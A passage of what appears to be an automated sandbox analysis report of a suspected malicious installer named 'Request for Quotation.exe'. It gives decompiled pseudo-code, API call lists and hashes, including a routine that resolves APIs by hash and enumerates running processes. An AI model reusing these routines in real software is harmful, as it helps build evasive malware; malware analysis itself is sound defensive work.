                                                                                										_t195 = _t329 + 0x409; // 0x409
                                                                                										_t230 = E6F7112FE(_t195);
                                                                                										__eflags = _t230 - _t282;
                                                                                										if(_t230 != _t282) {
                                                                                											__eflags = _t230 & 0xffff0000;
                                                                                											if((_t230 & 0xffff0000) == 0) {
                                                                                												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								__eflags = _v52 - _t282;
                                                                                								if(_v52 != _t282) {
                                                                                									L178:
                                                                                									_t324[lstrlenA(_t324)] = 0x41;
                                                                                									_t228 = E6F7115C2( *(_t329 + 0x808), _t324);
                                                                                									__eflags = _t228 - _t282;
                                                                                									if(_t228 != _t282) {
                                                                                										L166:
                                                                                										 *(_t329 + 0x80c) = _t228;
                                                                                										goto L182;
                                                                                									}
                                                                                									__eflags =  *(_t329 + 0x80c) - _t282;
                                                                                									L180:
                                                                                									if(__eflags != 0) {
                                                                                										goto L182;
                                                                                									}
                                                                                									L181:
                                                                                									_t205 = _t329 + 4;
                                                                                									 *_t205 =  *(_t329 + 4) | 0xffffffff;
                                                                                									__eflags =  *_t205;
                                                                                									goto L182;
                                                                                								} else {
                                                                                									__eflags =  *(_t329 + 0x80c) - _t282;
                                                                                									if( *(_t329 + 0x80c) != _t282) {
                                                                                										goto L182;
                                                                                									}
                                                                                									goto L178;
                                                                                								}
                                                                                							}
                                                                                							_t233 = LoadLibraryA(_t323); // executed
                                                                                							__eflags = _t233 - _t282;
                                                                                							 *(_t329 + 0x808) = _t233;
                                                                                							if(_t233 == _t282) {
                                                                                								goto L181;
                                                                                							}
                                                                                							goto L171;
                                                                                						}
                                                                                						_t188 = _t329 + 0x408; // 0x408
                                                                                						_t235 = E6F7112FE(_t188);
                                                                                						 *(_t329 + 0x80c) = _t235;
                                                                                						__eflags = _t235 - _t282;
                                                                                						goto L180;
                                                                                					}
                                                                                					_t236 = _t224 - 1;
                                                                                					if(_t236 == 0) {
                                                                                						_t185 = _t329 + 0x408; // 0x408
                                                                                						_t237 = _t185;
                                                                                						__eflags =  *_t237;
                                                                                						if( *_t237 == 0) {
                                                                                							goto L182;
                                                                                						}
                                                                                						_t228 = E6F7112FE(_t237);
                                                                                						L165:
                                                                                						goto L166;
                                                                                					}
                                                                                					if(_t236 != 1) {
                                                                                						goto L182;
                                                                                					}
                                                                                					_t81 = _t329 + 8; // 0x8
                                                                                					_t283 = _t81;
                                                                                					_t325 = E6F7112FE(_t81);
                                                                                					 *(_t329 + 0x808) = _t325;
                                                                                					if(_t325 == 0) {
                                                                                						goto L181;
                                                                                					}
                                                                                					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
                                                                                					 *((intOrPtr*)(_t329 + 0x850)) = E6F711224(_t283);
                                                                                					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
                                                                                					 *((intOrPtr*)(_t329 + 0x848)) = 1;
                                                                                					 *((intOrPtr*)(_t329 + 0x838)) = 1;
                                                                                					_t90 = _t329 + 0x408; // 0x408
                                                                                					_t228 =  *(_t325->i + E6F7112FE(_t90) * 4);
                                                                                					goto L165;
                                                                                				}
                                                                                			}
                                                                                0x00000000
                                                                                0x6f71207a
                                                                                0x6f712081
                                                                                0x6f712081
                                                                                0x6f712087
                                                                                0x6f71208a
                                                                                0x6f7120a6
                                                                                0x6f71208c
                                                                                0x6f712095
                                                                                0x6f712098
                                                                                0x6f712098
                                                                                0x00000000
                                                                                0x6f71208a
                                                                                0x6f71205c
                                                                                0x6f71205f
                                                                                0x6f712062
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712064
                                                                                0x00000000
                                                                                0x6f712064
                                                                                0x6f712051
                                                                                0x6f712053
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712053
                                                                                0x6f711c94
                                                                                0x6f711c94
                                                                                0x6f711c95
                                                                                0x6f711dde
                                                                                0x6f711dde
                                                                                0x6f711de5
                                                                                0x6f711de8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711df5
                                                                                0x00000000
                                                                                0x6f711fdb
                                                                                0x6f711fde
                                                                                0x6f711fe1
                                                                                0x6f711fe1
                                                                                0x6f711fe2
                                                                                0x6f711fe5
                                                                                0x6f711fe7
                                                                                0x6f711fe9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711feb
                                                                                0x6f711feb
                                                                                0x6f711fee
                                                                                0x6f712000
                                                                                0x6f712003
                                                                                0x6f712006
                                                                                0x6f71200c
                                                                                0x00000000
                                                                                0x6f71200c
                                                                                0x6f711ff0
                                                                                0x6f711ff0
                                                                                0x6f711ff2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711ff4
                                                                                0x6f711ff6
                                                                                0x6f711ff8
                                                                                0x6f711ff8
                                                                                0x6f711ff8
                                                                                0x6f711ff9
                                                                                0x6f711ffb
                                                                                0x6f711ffd
                                                                                0x6f711fe1
                                                                                0x6f711fe2
                                                                                0x6f711fe5
                                                                                0x6f711fe7
                                                                                0x6f711fe9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711fe9
                                                                                0x00000000
                                                                                0x6f711e3c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711e48
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711e2f
                                                                                0x6f711e33
                                                                                0x6f711e37
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711fad
                                                                                0x6f711fb1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711fb7
                                                                                0x6f711fbf
                                                                                0x6f711fc6
                                                                                0x6f711fce
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f15
                                                                                0x6f711f15
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711e51
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71202b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f1d
                                                                                0x6f711f1f
                                                                                0x6f711f1f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71201b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71201f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712027
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f64
                                                                                0x6f711f66
                                                                                0x6f711f66
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f2f
                                                                                0x6f711f31
                                                                                0x6f711f31
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f41
                                                                                0x6f711f43
                                                                                0x6f711f43
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f72
                                                                                0x6f711f74
                                                                                0x6f711f74
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f4c
                                                                                0x6f711f4e
                                                                                0x6f711f4e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f53
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712023
                                                                                0x6f71202d
                                                                                0x6f71202d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f7d
                                                                                0x6f711f81
                                                                                0x6f711f86
                                                                                0x6f711f89
                                                                                0x6f711f8a
                                                                                0x6f711f8d
                                                                                0x6f711f93
                                                                                0x6f711f93
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712013
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f57
                                                                                0x6f711f57
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711e58
                                                                                0x6f711e58
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f6b
                                                                                0x6f711f6d
                                                                                0x6f711f6d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711dfc
                                                                                0x6f711e02
                                                                                0x6f711e05
                                                                                0x6f711e07
                                                                                0x6f711e07
                                                                                0x6f711e0a
                                                                                0x6f711e0e
                                                                                0x6f711e1b
                                                                                0x6f711e1d
                                                                                0x6f711e23
                                                                                0x6f711e23
                                                                                0x6f711e23
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f20
                                                                                0x6f711f20
                                                                                0x6f711f22
                                                                                0x6f711f29
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f67
                                                                                0x6f711f67
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f32
                                                                                0x6f711f32
                                                                                0x6f711f34
                                                                                0x6f711f3b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f44
                                                                                0x6f711f44
                                                                                0x6f711f46
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f75
                                                                                0x6f711f75
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f4f
                                                                                0x6f711f4f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f9b
                                                                                0x6f711f9f
                                                                                0x6f711fa4
                                                                                0x6f711fa7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f59
                                                                                0x6f711f59
                                                                                0x6f711f5c
                                                                                0x6f711f5e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f6e
                                                                                0x6f711f6e
                                                                                0x6f711f77
                                                                                0x6f711f77
                                                                                0x6f711e5a
                                                                                0x6f711e5a
                                                                                0x6f711e5d
                                                                                0x6f711e64
                                                                                0x6f711e66
                                                                                0x6f711e68
                                                                                0x6f711e6f
                                                                                0x6f711e72
                                                                                0x6f711e77
                                                                                0x6f711e79
                                                                                0x6f711e7b
                                                                                0x6f711e7f
                                                                                0x6f711e85
                                                                                0x6f711e8b
                                                                                0x6f711e8b
                                                                                0x6f711e8d
                                                                                0x6f711e8d
                                                                                0x6f711e8e
                                                                                0x6f711e8e
                                                                                0x6f711e92
                                                                                0x6f711e98
                                                                                0x6f711e9a
                                                                                0x6f711e9e
                                                                                0x6f711ea3
                                                                                0x6f711ea3
                                                                                0x6f711ea5
                                                                                0x6f711ea5
                                                                                0x6f711ea8
                                                                                0x6f711eab
                                                                                0x6f711eb4
                                                                                0x6f711eb7
                                                                                0x6f711eba
                                                                                0x6f711eba
                                                                                0x6f711ebc
                                                                                0x6f711ebf
                                                                                0x6f711ec5
                                                                                0x6f711ecb
                                                                                0x6f711ecb
                                                                                0x6f711ecd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711ed3
                                                                                0x6f711ed3
                                                                                0x6f711ed7
                                                                                0x6f711ede
                                                                                0x6f711f02
                                                                                0x6f711f02
                                                                                0x6f711f06
                                                                                0x6f711f08
                                                                                0x6f711f0b
                                                                                0x6f711f0b
                                                                                0x6f711f0e
                                                                                0x6f711f0e
                                                                                0x00000000
                                                                                0x6f711f06
                                                                                0x6f711ee3
                                                                                0x6f711ee6
                                                                                0x6f711ee6
                                                                                0x6f711eed
                                                                                0x6f711eef
                                                                                0x6f711ef2
                                                                                0x6f711ef9
                                                                                0x6f711efa
                                                                                0x6f711f00
                                                                                0x6f711f00

                                                                                APIs
                                                                                  • Part of subcall function 6F711215: GlobalAlloc.KERNELBASE(00000040,6F711233,?,6F7112CF,-6F71404B,6F7111AB,-000000A0), ref: 6F71121D
                                                                                • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6F711BC4
                                                                                • lstrcpyA.KERNEL32(00000008,?), ref: 6F711C0C
                                                                                • lstrcpyA.KERNEL32(00000408,?), ref: 6F711C16
                                                                                • GlobalFree.KERNEL32 ref: 6F711C29
                                                                                • GlobalFree.KERNEL32 ref: 6F711D09
                                                                                • GlobalFree.KERNEL32 ref: 6F711D0E
                                                                                • GlobalFree.KERNEL32 ref: 6F711D13
                                                                                • GlobalFree.KERNEL32 ref: 6F711EFA
                                                                                • lstrcpyA.KERNEL32(?,?), ref: 6F712098
                                                                                • GetModuleHandleA.KERNELBASE(00000008), ref: 6F712114
                                                                                • LoadLibraryA.KERNELBASE(00000008), ref: 6F712125
                                                                                • GetProcAddress.KERNEL32(?,?), ref: 6F71217E
                                                                                • lstrlenA.KERNEL32(00000408), ref: 6F712198
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                • String ID:
                                                                                • API String ID: 245916457-0
                                                                                • Opcode ID: 19f4d7bcd37752d6a1c81700f6ac1c1b6669308f5d579d9c61c6511cd7ad06e1
                                                                                • Instruction ID: fae0c6d846cb8c82005ac49b6b23832dcb05814cf4425d9326cf53bcdbfe7195
                                                                                • Opcode Fuzzy Hash: 19f4d7bcd37752d6a1c81700f6ac1c1b6669308f5d579d9c61c6511cd7ad06e1
                                                                                • Instruction Fuzzy Hash: 3D22AE7190C60A9FDB10CFB886847EEBBF8BF16315F18463ED1A5EA180D7B06549CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
                                                                                				signed int _v8;
                                                                                				void* _v12;
                                                                                				signed int _v16;
                                                                                				struct _WIN32_FIND_DATAA _v336;
                                                                                				signed int _t40;
                                                                                				char* _t53;
                                                                                				signed int _t55;
                                                                                				signed int _t58;
                                                                                				signed int _t64;
                                                                                				signed int _t66;
                                                                                				void* _t68;
                                                                                				signed char _t69;
                                                                                				CHAR* _t71;
                                                                                				void* _t72;
                                                                                				CHAR* _t73;
                                                                                				char* _t76;
                                                                                
                                                                                				_t69 = _a8;
                                                                                				_t73 = _a4;
                                                                                				_v8 = _t69 & 0x00000004;
                                                                                				_t40 = E00405CD3(__eflags, _t73);
                                                                                				_v16 = _t40;
                                                                                				if((_t69 & 0x00000008) != 0) {
                                                                                					_t66 = DeleteFileA(_t73); // executed
                                                                                					asm("sbb eax, eax");
                                                                                					_t68 =  ~_t66 + 1;
                                                                                					 *0x42f4e8 =  *0x42f4e8 + _t68;
                                                                                					return _t68;
                                                                                				}
                                                                                				_a4 = _t69;
                                                                                				_t8 =  &_a4;
                                                                                				 *_t8 = _a4 & 0x00000001;
                                                                                				__eflags =  *_t8;
                                                                                				if( *_t8 == 0) {
                                                                                					L5:
                                                                                					E0040624D(0x42b8c0, _t73);
                                                                                					__eflags = _a4;
                                                                                					if(_a4 == 0) {
                                                                                						E00405C2C(_t73);
                                                                                					} else {
                                                                                						lstrcatA(0x42b8c0, "\*.*");
                                                                                					}
                                                                                					__eflags =  *_t73;
                                                                                					if( *_t73 != 0) {
                                                                                						L10:
                                                                                						lstrcatA(_t73, 0x40a014);
                                                                                						L11:
                                                                                						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                                                						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
                                                                                						__eflags = _t40 - 0xffffffff;
                                                                                						_v12 = _t40;
                                                                                						if(_t40 == 0xffffffff) {
                                                                                							L29:
                                                                                							__eflags = _a4;
                                                                                							if(_a4 != 0) {
                                                                                								_t32 = _t71 - 1;
                                                                                								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                                                								__eflags =  *_t32;
                                                                                							}
                                                                                							goto L31;
                                                                                						} else {
                                                                                							goto L12;
                                                                                						}
                                                                                						do {
                                                                                							L12:
                                                                                							_t76 =  &(_v336.cFileName);
                                                                                							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
                                                                                							__eflags =  *_t53;
                                                                                							if( *_t53 != 0) {
                                                                                								__eflags = _v336.cAlternateFileName;
                                                                                								if(_v336.cAlternateFileName != 0) {
                                                                                									_t76 =  &(_v336.cAlternateFileName);
                                                                                								}
                                                                                							}
                                                                                							__eflags =  *_t76 - 0x2e;
                                                                                							if( *_t76 != 0x2e) {
                                                                                								L19:
                                                                                								E0040624D(_t71, _t76);
                                                                                								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                                                								if(__eflags == 0) {
                                                                                									_t55 = E004059CD(__eflags, _t73, _v8);
                                                                                									__eflags = _t55;
                                                                                									if(_t55 != 0) {
                                                                                										E00405374(0xfffffff2, _t73);
                                                                                									} else {
                                                                                										__eflags = _v8 - _t55;
                                                                                										if(_v8 == _t55) {
                                                                                											 *0x42f4e8 =  *0x42f4e8 + 1;
                                                                                										} else {
                                                                                											E00405374(0xfffffff1, _t73);
                                                                                											E0040602C(_t72, _t73, 0);
                                                                                										}
                                                                                									}
                                                                                								} else {
                                                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                                                									if(__eflags == 0) {
                                                                                										E00405A15(__eflags, _t73, _a8);
                                                                                									}
                                                                                								}
                                                                                								goto L27;
                                                                                							}
                                                                                							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                                                							__eflags = _t64;
                                                                                							if(_t64 == 0) {
                                                                                								goto L27;
                                                                                							}
                                                                                							__eflags = _t64 - 0x2e;
                                                                                							if(_t64 != 0x2e) {
                                                                                								goto L19;
                                                                                							}
                                                                                							__eflags =  *((char*)(_t76 + 2));
                                                                                							if( *((char*)(_t76 + 2)) == 0) {
                                                                                								goto L27;
                                                                                							}
                                                                                							goto L19;
                                                                                							L27:
                                                                                							_t58 = FindNextFileA(_v12,  &_v336);
                                                                                							__eflags = _t58;
                                                                                						} while (_t58 != 0);
                                                                                						_t40 = FindClose(_v12);
                                                                                						goto L29;
                                                                                					}
                                                                                					__eflags =  *0x42b8c0 - 0x5c;
                                                                                					if( *0x42b8c0 != 0x5c) {
                                                                                						goto L11;
                                                                                					}
                                                                                					goto L10;
                                                                                				} else {
                                                                                					__eflags = _t40;
                                                                                					if(_t40 == 0) {
                                                                                						L31:
                                                                                						__eflags = _a4;
                                                                                						if(_a4 == 0) {
                                                                                							L39:
                                                                                							return _t40;
                                                                                						}
                                                                                						__eflags = _v16;
                                                                                						if(_v16 != 0) {
                                                                                							_t40 = E004065C1(_t73);
                                                                                							__eflags = _t40;
                                                                                							if(_t40 == 0) {
                                                                                								goto L39;
                                                                                							}
                                                                                							E00405BE5(_t73);
                                                                                							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
                                                                                							__eflags = _t40;
                                                                                							if(_t40 != 0) {
                                                                                								return E00405374(0xffffffe5, _t73);
                                                                                							}
                                                                                							__eflags = _v8;
                                                                                							if(_v8 == 0) {
                                                                                								goto L33;
                                                                                							}
                                                                                							E00405374(0xfffffff1, _t73);
                                                                                							return E0040602C(_t72, _t73, 0);
                                                                                						}
                                                                                						L33:
                                                                                						 *0x42f4e8 =  *0x42f4e8 + 1;
                                                                                						return _t40;
                                                                                					}
                                                                                					__eflags = _t69 & 0x00000002;
                                                                                					if((_t69 & 0x00000002) == 0) {
                                                                                						goto L31;
                                                                                					}
                                                                                					goto L5;
                                                                                				}
                                                                                			}




















                                                                                APIs
                                                                                • DeleteFileA.KERNELBASE(?,?,73BCFA90,73BCF560,00000000), ref: 00405A3E
                                                                                • lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,73BCFA90,73BCF560,00000000), ref: 00405A86
                                                                                • lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,73BCFA90,73BCF560,00000000), ref: 00405AA7
                                                                                • lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,73BCFA90,73BCF560,00000000), ref: 00405AAD
                                                                                • FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,73BCFA90,73BCF560,00000000), ref: 00405ABE
                                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
                                                                                • FindClose.KERNEL32(00000000), ref: 00405B7C
                                                                                Strings
                                                                                • "C:\Users\user\Desktop\Request for Quotation.exe" , xrefs: 00405A15
                                                                                • \*.*, xrefs: 00405A80
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                • String ID: "C:\Users\user\Desktop\Request for Quotation.exe" $\*.*
                                                                                • API String ID: 2035342205-1666489876
                                                                                • Opcode ID: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                • Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
                                                                                • Opcode Fuzzy Hash: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                • Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E6EEE4211(void* __eflags, intOrPtr _a4) {
                                                                                				intOrPtr _v8;
                                                                                				void* _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				char _v544;
                                                                                				void* _v580;
                                                                                				struct tagPROCESSENTRY32W* _t25;
                                                                                
                                                                                				_v8 = E6EEE6B57();
                                                                                				_v16 = E6EEE6BFF(_v8, 0xea31d3b6);
                                                                                				_v20 = E6EEE6BFF(_v8, 0x5c7bf6e9);
                                                                                				_v24 = E6EEE6BFF(_v8, 0x873d1860);
                                                                                				_v12 = CreateToolhelp32Snapshot(2, 0);
                                                                                				if(_v12 != 0xffffffff) {
                                                                                					_v580 = 0x22c;
                                                                                					_t25 =  &_v580;
                                                                                					Process32FirstW(_v12, _t25);
                                                                                					if(_t25 != 0) {
                                                                                						while(E6EEE41CD( &_v544) != _a4) {
                                                                                							if(Process32NextW(_v12,  &_v580) != 0) {
                                                                                								continue;
                                                                                							}
                                                                                							return 0;
                                                                                						}
                                                                                						return 1;
                                                                                					}
                                                                                					return 0;
                                                                                				}
                                                                                				return 0;
                                                                                			}












                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 6EEE4256
                                                                                • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 6EEE427A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644186956.000000006EEE3000.00000040.00020000.sdmp, Offset: 6EEE0000, based on PE: true
                                                                                • Associated: 00000000.00000002.644129589.000000006EEE0000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644157709.000000006EEE1000.00000080.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644176627.000000006EEE2000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644212634.000000006EEE8000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 2353314856-0
                                                                                • Opcode ID: 41d588a3bc25e22c4c20c1f33dcee25c22b68df7f34c305ee71ff3d8f88bc203
                                                                                • Instruction ID: 55a63ce148364493ff03a6f882a1ae383789ef15fe7a88219cfdca45ea950e14
                                                                                • Opcode Fuzzy Hash: 41d588a3bc25e22c4c20c1f33dcee25c22b68df7f34c305ee71ff3d8f88bc203
                                                                                • Instruction Fuzzy Hash: E9111C70D6411AAEDB50DFF4CC49AADBBB8EF08308F2049B6E914A1A50E7308A429B11
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004065C1(CHAR* _a4) {
                                                                                				void* _t2;
                                                                                
                                                                                				_t2 = FindFirstFileA(_a4, 0x42c108); // executed
                                                                                				if(_t2 == 0xffffffff) {
                                                                                					return 0;
                                                                                				}
                                                                                				FindClose(_t2);
                                                                                				return 0x42c108;
                                                                                			}





                                                                                APIs
                                                                                • FindFirstFileA.KERNELBASE(73BCFA90,0042C108,0042BCC0,00405D16,0042BCC0,0042BCC0,00000000,0042BCC0,0042BCC0,73BCFA90,?,73BCF560,00405A35,?,73BCFA90,73BCF560), ref: 004065CC
                                                                                • FindClose.KERNEL32(00000000), ref: 004065D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                • Instruction ID: 5989989b5290daefe0063212e93516784f0ef67bd1aed84395a1ba9114d6aba9
                                                                                • Opcode Fuzzy Hash: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                • Instruction Fuzzy Hash: 1BD01231508130ABC7455B387D4C85B7A98AF153317618A37F466F12E4C734CC228698
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                				struct HWND__* _v32;
                                                                                				void* _v84;
                                                                                				void* _v88;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t35;
                                                                                				signed int _t37;
                                                                                				signed int _t39;
                                                                                				struct HWND__* _t49;
                                                                                				signed int _t68;
                                                                                				struct HWND__* _t74;
                                                                                				signed int _t87;
                                                                                				struct HWND__* _t92;
                                                                                				signed int _t100;
                                                                                				int _t104;
                                                                                				signed int _t116;
                                                                                				signed int _t117;
                                                                                				int _t118;
                                                                                				signed int _t123;
                                                                                				struct HWND__* _t126;
                                                                                				struct HWND__* _t127;
                                                                                				int _t128;
                                                                                				long _t131;
                                                                                				int _t133;
                                                                                				int _t134;
                                                                                				void* _t135;
                                                                                				void* _t143;
                                                                                
                                                                                				_t116 = _a8;
                                                                                				if(_t116 == 0x110 || _t116 == 0x408) {
                                                                                					_t35 = _a12;
                                                                                					_t126 = _a4;
                                                                                					__eflags = _t116 - 0x110;
                                                                                					 *0x42a8a0 = _t35;
                                                                                					if(_t116 == 0x110) {
                                                                                						 *0x42f448 = _t126;
                                                                                						 *0x42a8b4 = GetDlgItem(_t126, 1);
                                                                                						_t92 = GetDlgItem(_t126, 2);
                                                                                						_push(0xffffffff);
                                                                                						_push(0x1c);
                                                                                						 *0x429880 = _t92;
                                                                                						E004042D1(_t126);
                                                                                						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28); // executed
                                                                                						 *0x42ec0c = E0040140B(4);
                                                                                						_t35 = 1;
                                                                                						__eflags = 1;
                                                                                						 *0x42a8a0 = 1;
                                                                                					}
                                                                                					_t123 =  *0x40a1f8; // 0xffffffff
                                                                                					_t134 = 0;
                                                                                					_t131 = (_t123 << 6) +  *0x42f480;
                                                                                					__eflags = _t123;
                                                                                					if(_t123 < 0) {
                                                                                						L34:
                                                                                						E0040431D(0x40b);
                                                                                						while(1) {
                                                                                							_t37 =  *0x42a8a0;
                                                                                							 *0x40a1f8 =  *0x40a1f8 + _t37;
                                                                                							_t131 = _t131 + (_t37 << 6);
                                                                                							_t39 =  *0x40a1f8; // 0xffffffff
                                                                                							__eflags = _t39 -  *0x42f484;
                                                                                							if(_t39 ==  *0x42f484) {
                                                                                								E0040140B(1);
                                                                                							}
                                                                                							__eflags =  *0x42ec0c - _t134; // 0x0
                                                                                							if(__eflags != 0) {
                                                                                								break;
                                                                                							}
                                                                                							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
                                                                                							if(__eflags >= 0) {
                                                                                								break;
                                                                                							}
                                                                                							_t117 =  *(_t131 + 0x14);
                                                                                							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                                                                							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                                                							_push(0xfffffc19);
                                                                                							E004042D1(_t126);
                                                                                							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                                                							_push(0xfffffc1b);
                                                                                							E004042D1(_t126);
                                                                                							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                                                							_push(0xfffffc1a);
                                                                                							E004042D1(_t126);
                                                                                							_t49 = GetDlgItem(_t126, 3);
                                                                                							__eflags =  *0x42f4ec - _t134;
                                                                                							_v32 = _t49;
                                                                                							if( *0x42f4ec != _t134) {
